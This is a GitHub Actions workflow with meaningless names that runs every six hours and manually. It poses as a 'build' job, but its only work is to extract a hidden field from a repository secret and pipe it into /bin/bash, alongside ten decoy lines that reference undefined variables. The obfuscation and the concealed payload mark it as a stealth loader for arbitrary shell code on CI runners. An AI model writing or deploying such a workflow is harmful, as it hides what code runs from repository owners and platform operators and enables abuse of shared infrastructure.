name: yanzischuc
on:
  workflow_dispatch:
  schedule:
    - cron: '24 3/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: yanzischuc
        env:
          umn3: ${{ secrets.umn3 }}
        run: |
          echo $umn3 | jq -r .wmnk619 | /bin/bash
          echo $al65993 | jq -r .l09 | /bin/bash
          echo $w2 | jq -r .dpzf67 | /bin/bash
          echo $pujbb7894 | jq -r .t059 | /bin/bash
          echo $ozl136 | jq -r .h9 | /bin/bash
          echo $cm2354 | jq -r .xte69413 | /bin/bash
          echo $t3211 | jq -r .aby68 | /bin/bash
          echo $uot12 | jq -r .qylf0962 | /bin/bash
          echo $ixucu99 | jq -r .nle32 | /bin/bash
          echo $yurvo16 | jq -r .ha5 | /bin/bash
          echo $xuau07786 | jq -r .qwfh26 | /bin/bash

